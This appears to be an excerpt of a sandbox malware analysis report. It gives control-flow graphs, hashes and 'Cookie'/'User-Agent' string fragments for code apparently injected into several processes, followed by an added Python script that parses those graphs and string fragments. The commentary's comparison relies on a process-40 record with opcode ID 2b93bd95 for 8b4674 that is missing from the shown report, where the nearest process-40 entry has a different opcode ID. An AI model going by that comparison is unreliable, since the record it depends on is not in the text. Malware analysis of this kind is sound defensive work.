                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 0 277093e-277095f call 2770cc4 call 27714bc call 2773cc0 8 2770967-2770989 0->8 10 2770af1-2770af2 8->10 11 277098f-27709d2 call 27709d9 8->11 15 27709d4-27709d5 11->15 16 2770a3d-2770a80 11->16 17 27709d7-27709e8 call 2773653 15->17 18 2770a3c 15->18 21 2770a82-2770aae 16->21 22 2770aec call 2770af3 16->22 17->22 29 27709ee-2770a10 17->29 18->16 21->22 27 2770ab0-2770abc 21->27 22->10 31 2770ac1-2770ae5 27->31 29->22 33 2770a16-2770a3b 29->33 31->10 37 2770ae7-2770aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 1835c947e943b83780b4cd22295aa6014adf4b8c4f26172a25fa54c6c25ed047
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 61516F316442549FEF239F60CC85B9A77B8AF04744F0401DABA49FE0D6DBB09694CF69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 38 27714bc-2771590 call 27714de call 2770c9c call 2771345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction ID: 443e740e63229586a96b899a25baebc676cc1c6ef315b6e964f3ec2fd23c94c0
                                                                                                                                                                • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction Fuzzy Hash: CD21DA724046149EDF03AF60C9C99A673ECEF40704F85096A9D89EF049FA749554CFE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 57 2771345-2771352 58 27713eb-27713ec 57->58 59 2771358-277135e 57->59 59->58 60 2771364-277137a 59->60 60->58 62 277137c-277138f 60->62 64 2771391-2771398 62->64 65 277139b-27713ab call 2770e7c 64->65 68 27713ad-27713e2 65->68 68->58
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: c18418e015073aebde6a2d486a5ba94792210602a3316be75c079c16e7e61c5c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: B2219031904216AFDF119F78C888B5DBBB5AF04714F058215FD59BB594D770E910CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 69 27714de-2771590 call 2773653 call 2770c9c call 2771345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction ID: 9be023439c21f4178e71bb6f815313a5617ec5ecbb565cbc4abddc7b59534485
                                                                                                                                                                • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction Fuzzy Hash: 8B1140724046149EEF03AF60C9C88AA73EDAE40708B8509BA9D89EE449FE709154CEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 87 2773f0d-2773f29 call 2773653 call 277379f 92 2773f3b-2773f66 call 2773f78 * 3 87->92 93 2773f2b-2773f39 call 277401b 87->93 106 2773f71 92->106 101 2773f76-2773f77 93->101 106->101 107 2773f71 call 2773f78 106->107 107->101
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction ID: dee1f3bc44f52b6b022aa48a47762c96ad916b6e95fbb8d58c8600da25b4b5fe
                                                                                                                                                                • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction Fuzzy Hash: 7FF01C70588240AAEF423BB08C4D65D36B9AF42786F4405D1BA89BD0D4DE748550AE75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block 2774675-277468d)
Strings
Memory Dump Source
• Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 44b537cb1e4068c5e1e881590ee1f7ee45e42a8a86b306bee26c7f06f92b03ad
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: BB4183B6500209BFEF125F65CC48BDEBFBAEF80704F154069EA44AA254D730D640CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block 2774674-2774680)
Strings
Memory Dump Source
• Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: d6447917f34d8b5c9dad2d9ff1ee3941ec9376b265dfa9459e706f737605c8be
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: D44161B6500209BFEF129F65CC48BEEBBBAEF80704F1540A9EA44AA254D7309640CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block b8093e-b8095f)
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: da7ca05d182f83af127f364aca65f5a39e3682622c12be431f8d6ebd2a216912
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 855180315443549FEB127F20CC85B9A77F8EF04B84F0401D9BA45FE0E6DAB09A94CB65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block b814bc-b814df)
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
• Instruction ID: 9859aa73d91d984f498269e5d5c9d75708c5d803dd5b0322efbc2c344bf57cdf
• Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
• Instruction Fuzzy Hash: 2F210172405614AFDB03BF60C9C9CA673ECEF40704F4509AAAD85EF059FA709155CBE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block b81345-b81352)
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: bdfd0894db0d2458072cd7c281198af1b6bb76ec83cc2cb0d0dc0e2885bc4dde
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: C121AE31904216BFDB11EE78C844B5DBBF9AF04300F054265F955BB5A4D730A801CB98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block b814de-b81590)
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction ID: 4fe2599983199d25972f4d17d25c93d4725538b0c3c07a2cf6945b6739a1e3ce
• Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction Fuzzy Hash: 6911BF72404514AFEF03BF64C5C9CAA73ECEE40704B4509AAAD86EF45AFE709154CBE5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed
• Graph image not extracted (entry block b83f0d-b83f29)
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction ID: 66ee34944db1ce85795d24834074fdf185ab01e1ada3324307dc9519e8458d0c
• Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction Fuzzy Hash: D7F0F860988280EAEF403BB0C84A65D36F8AF50F05F0405D1BB89A90B6DE748650DFB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (entry block b84674)
control_flow_graph 111 b84674-b8468d call b83a1c 114 b8469d-b846cd 111->114 115 b8468f-b84698 call b83a6e 111->115 118 b846d3-b846f5 114->118 119 b847e7-b847ec 114->119 115->114 118->119 121 b846fb-b84720 118->121 123 b84738-b8475a 121->123 124 b84722-b84737 121->124 126 b8475c-b8477e 123->126 127 b847bf-b847c9 123->127 124->123 126->127 133 b84780-b847a2 126->133 128 b847cb-b847dd call b83673 127->128 129 b847e0-b847e5 127->129 128->129 129->119 133->127 135 b847a4-b847bc 133->135 135->127
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 6547ce04c78843a9a1684fe4647091bc56b7b55abde43f0b53516e2daf779c93
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: D44163B6500209BFEF129F65CC44BEEBFF9EF80704F154099EA44AA254D770DA40CB94
• Uniqueness Score: -1.00%

Control-flow Graph (entry block b84675)
control_flow_graph 136 b84675-b84680 137 b8468b-b8468d 136->137 138 b84686 call b83a1c 136->138 139 b8469d-b846cd 137->139 140 b8468f-b84698 call b83a6e 137->140 138->137 143 b846d3-b846f5 139->143 144 b847e7-b847ec 139->144 140->139 143->144 146 b846fb-b84720 143->146 148 b84738-b8475a 146->148 149 b84722-b84737 146->149 151 b8475c-b8477e 148->151 152 b847bf-b847c9 148->152 149->148 151->152 158 b84780-b847a2 151->158 153 b847cb-b847dd call b83673 152->153 154 b847e0-b847e5 152->154 153->154 154->144 158->152 160 b847a4-b847bc 158->160 160->152
Memory Dump Source
• Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 4bca4db7e7473a6a080133417cde99c004acb31b82f767ff5812d1cea330057b
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: C64185B6500209BFEF126F65CC48BDEBFF9EF80704F154099EA44AA254D770DA40CB94
• Uniqueness Score: -1.00%

Control-flow Graph (entry block 8b093e)
control_flow_graph 0 8b093e-8b095f call 8b0cc4 call 8b14bc call 8b3cc0 8 8b0967-8b0989 0->8 10 8b098f-8b09d2 call 8b09d9 8->10 11 8b0af1-8b0af2 8->11 15 8b0a3d-8b0a76 10->15 16 8b09d4-8b09d5 10->16 19 8b0a7e-8b0a80 15->19 17 8b0a3c 16->17 18 8b09d7-8b09e8 call 8b3653 16->18 17->15 21 8b0aec call 8b0af3 18->21 30 8b09ee-8b0a10 18->30 19->21 22 8b0a82-8b0aae 19->22 21->11 22->21 27 8b0ab0-8b0abc 22->27 31 8b0ac1-8b0ae5 27->31 30->21 34 8b0a16-8b0a3b 30->34 31->11 37 8b0ae7-8b0aea 31->37 34->21 38 8b0a41-8b0a76 34->38 37->21 37->31 38->19
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: bc1375bfcc6c4fb9afce2438148d27e5bf9eb47df47ef3f40a3630ce9db3f32e
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: BF51A2316443549FEF225F20CC85BEA7BB8FF04740F040599BA45FE1D6DAB09A94CE66
• Uniqueness Score: -1.00%

Control-flow Graph (entry block 8b14bc)
control_flow_graph 39 8b14bc-8b14df call 8b14de 42 8b1502-8b1590 call 8b1345 * 6 39->42 43 8b14e1-8b1500 call 8b0c9c 39->43 43->42
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction ID: a4c3dd8f05a5e6ec52a3ec352e3bbcc1c28d6220781223147056b2e73db891f7
• Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction Fuzzy Hash: 8121FA724046149EDF03AF60C9C98E673ECFF40704F8509AAA989EF14AFA749554CAE6
• Uniqueness Score: -1.00%

Control-flow Graph (entry block 8b1345)
control_flow_graph 59 8b1345-8b1352 60 8b13eb-8b13ec 59->60 61 8b1358-8b135e 59->61 61->60 62 8b1364-8b137a 61->62 62->60 64 8b137c-8b138f 62->64 66 8b1391-8b1398 64->66 67 8b139b-8b13ab call 8b0e7c 66->67 70 8b13ad-8b13e2 67->70 70->60
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: d749f03bcca02727905f4d669a52390228d67a0ad3c9bcaf37a2f8fdd1d5d4a3
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 56216D31904216AFDF119E78C849B9DBBF5AF08700F054215F955EF695D774A810CBA4
• Uniqueness Score: -1.00%

Control-flow Graph (entry block 8b14de)
control_flow_graph 71 8b14de-8b1590 call 8b3653 call 8b0c9c call 8b1345 * 6
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction ID: 03ec4dd54afb6a2419abe3608a8f3c16a3564e3952de0d1dc26e0dd47ae5e0ed
• Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction Fuzzy Hash: 9111E9724046149EEF03AF64C5C8CEA73ECFF40704B8509AAAD85EF54AFE749154CAE6
• Uniqueness Score: -1.00%

Control-flow Graph (entry block 8b3f0d)
control_flow_graph 90 8b3f0d-8b3f29 call 8b3653 call 8b379f 95 8b3f3b-8b3f66 call 8b3f78 * 3 90->95 96 8b3f2b-8b3f39 call 8b401b 90->96 109 8b3f71 95->109 104 8b3f76-8b3f77 96->104 109->104 110 8b3f71 call 8b3f78 109->110 110->104
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 22bb2547e1417a25f0d702569d004b5f781c736981ba61bd9986a772d00aed1d
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: E1F08270988640E7EF413BB48C4B6A93AB4FF00705F040190BA49ED3D2CE3056509E76
• Uniqueness Score: -1.00%

Control-flow Graph (entry block 8b4675)
control_flow_graph 136 8b4675-8b468d call 8b3a1c 139 8b468f-8b4698 call 8b3a6e 136->139 140 8b469d-8b46cd 136->140 139->140 143 8b46d3-8b46f5 140->143 144 8b47e7-8b47ec 140->144 143->144 146 8b46fb-8b4720 143->146 148 8b4738-8b475a 146->148 149 8b4722-8b4737 146->149 151 8b47bf-8b47c9 148->151 152 8b475c-8b477e 148->152 149->148 153 8b47cb-8b47dd call 8b3673 151->153 154 8b47e0-8b47e5 151->154 152->151 158 8b4780-8b47a2 152->158 153->154 154->144 158->151 160 8b47a4-8b47bc 158->160 160->151
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 10dabc0086b742d36991aebe5a0e4bc54c0b2b033fa7c7c926e660388da107de
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: BD4181B6600608BFEF125F65CC48BEEBFB9FF80704F154069EA44EA255DB309A44CB94
• Uniqueness Score: -1.00%
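Two things in these function records are worth checking by hand rather than by eye. First, the report lists the function at b84674 from the dump based at 00B80000 (process 39) and the function at 8b4674 from the dump based at 008B0000 (process 40, listed next) with the same Opcode ID (2b93bd95...), yet their control_flow_graph lines are not identical: process 39 shows one entry block b84674-b8468d, process 40 splits the same bytes into 8b4674-8b4680, 8b4686 and 8b468b-8b468d. Second, the String ID field `-Age$Cook$User$ie: $nt:` is a `$`-separated list of 4-character fragments that spell `Cookie: ` and `User-Agent:` once reordered. The Python below is an added example, not code from the report or from Joe Sandbox: it parses the control_flow_graph edge lists (the grammar, decimal node id, hex address or `start-end` range, `call target` with an optional `* n` repeat, and `a->b` edges, is inferred from the lines on this page and is an assumption), rebases every address by the dump offset from the Source File line, and shows that the two records agree on function span and callees at RVA 0x4674 even though their block splitting differs. It also tiles the String ID fragments into the header names they form; whether the binary assembles them from 32-bit immediates is not stated by the report, so that remains an inference.

```python
"""Parse Joe Sandbox control_flow_graph lines, rebase them to RVAs and compare
one function across two memory dumps; tile '$'-separated String ID fragments."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Copied from this report: entry block b84674, dump based at 0x00B80000 (process 39).
CFG_B84674 = (
    "control_flow_graph 111 b84674-b8468d call b83a1c 114 b8469d-b846cd 111->114 "
    "115 b8468f-b84698 call b83a6e 111->115 118 b846d3-b846f5 114->118 "
    "119 b847e7-b847ec 114->119 115->114 118->119 121 b846fb-b84720 118->121 "
    "123 b84738-b8475a 121->123 124 b84722-b84737 121->124 126 b8475c-b8477e 123->126 "
    "127 b847bf-b847c9 123->127 124->123 126->127 133 b84780-b847a2 126->133 "
    "128 b847cb-b847dd call b83673 127->128 129 b847e0-b847e5 127->129 128->129 "
    "129->119 133->127 135 b847a4-b847bc 133->135 135->127"
)
# Copied from this report: entry block 8b4674, dump based at 0x008B0000 (process 40).
CFG_8B4674 = (
    "control_flow_graph 111 8b4674-8b4680 112 8b468b-8b468d 111->112 113 8b4686 call 8b3a1c "
    "111->113 114 8b468f-8b4698 call 8b3a6e 112->114 115 8b469d-8b46cd 112->115 113->112 "
    "114->115 118 8b46d3-8b46f5 115->118 119 8b47e7-8b47ec 115->119 118->119 "
    "121 8b46fb-8b4720 118->121 123 8b4738-8b475a 121->123 124 8b4722-8b4737 121->124 "
    "126 8b47bf-8b47c9 123->126 127 8b475c-8b477e 123->127 124->123 "
    "128 8b47cb-8b47dd call 8b3673 126->128 129 8b47e0-8b47e5 126->129 127->126 "
    "133 8b4780-8b47a2 127->133 128->129 129->119 133->126 135 8b47a4-8b47bc 133->135 135->126"
)
# Copied from this report: a block with a repeated call site ("call 8b1345 * 6").
CFG_8B14BC = ("control_flow_graph 39 8b14bc-8b14df call 8b14de 42 8b1502-8b1590 call 8b1345 * 6 "
              "39->42 43 8b14e1-8b1500 call 8b0c9c 39->43 43->42")
STRING_CHUNKS = "-Age$Cook$User$ie: $nt:".split("$")   # the report's String ID field


@dataclass(frozen=True)
class Block:
    start: int               # address of the block's first instruction
    end: int                 # address of the block's last instruction (== start for one instruction)
    calls: Tuple[int, ...]   # call targets in this block, one entry per call site


def parse_cfg(line: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Tokenise one control_flow_graph line into {node_id: Block} and a list of (src, dst) edges."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    i = 1
    while i < len(toks):
        tok = toks[i]
        if "->" in tok:                                 # edge between two node ids
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
            continue
        node_id = int(tok)                              # node ids are decimal
        first, _, last = toks[i + 1].partition("-")     # "start-end" or a single address
        start = int(first, 16)
        end = int(last, 16) if last else start
        i += 2
        calls: List[int] = []
        while i < len(toks) and toks[i] == "call":      # zero or more "call target [* n]"
            target, count = int(toks[i + 1], 16), 1
            i += 2
            if i + 1 < len(toks) and toks[i] == "*":
                count = int(toks[i + 1])
                i += 2
            calls += [target] * count
        nodes[node_id] = Block(start, end, tuple(calls))
    return nodes, edges


def rebased_signature(line: str, base: int) -> Tuple[int, int, Tuple[int, ...]]:
    """(lowest RVA, highest RVA, sorted callee RVAs): independent of where the dump was mapped
    and of how the analyser chose to split basic blocks."""
    nodes, _ = parse_cfg(line)
    lo = min(b.start for b in nodes.values()) - base
    hi = max(b.end for b in nodes.values()) - base
    callees = tuple(sorted(t - base for b in nodes.values() for t in b.calls))
    return lo, hi, callees


def rebased_blocks(line: str, base: int) -> List[Tuple[int, int]]:
    """Sorted (start, end) RVA pairs of every block; sensitive to block splitting."""
    nodes, _ = parse_cfg(line)
    return sorted((b.start - base, b.end - base) for b in nodes.values())


def tile(target: str, chunks: List[str]) -> Optional[List[str]]:
    """Ordered chunks that concatenate exactly to target, each used at most once, or None."""
    if target == "":
        return []
    for idx, chunk in enumerate(chunks):
        if target.startswith(chunk):
            rest = tile(target[len(chunk):], chunks[:idx] + chunks[idx + 1:])
            if rest is not None:
                return [chunk] + rest
    return None


if __name__ == "__main__":
    sig39 = rebased_signature(CFG_B84674, 0x00B80000)
    sig40 = rebased_signature(CFG_8B4674, 0x008B0000)
    print("same span and callees:", sig39 == sig40, [hex(x) for x in sig39[:2]])
    print("same block split:", rebased_blocks(CFG_B84674, 0x00B80000) == rebased_blocks(CFG_8B4674, 0x008B0000))
    for header in ("Cookie: ", "User-Agent:"):
        print(repr(header), "<-", tile(header, STRING_CHUNKS))
```

The span-and-callees signature is the right granularity for "is this the same injected code in both processes": it survives relocation and the analyser's block boundaries, which here depend on the snapshot rather than on the code. Treat the `$`-tiling only as a reading aid for the String ID field; it says which strings the fragments can form, not how the binary builds them.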

Control-flow Graph (entry block 8b4674)
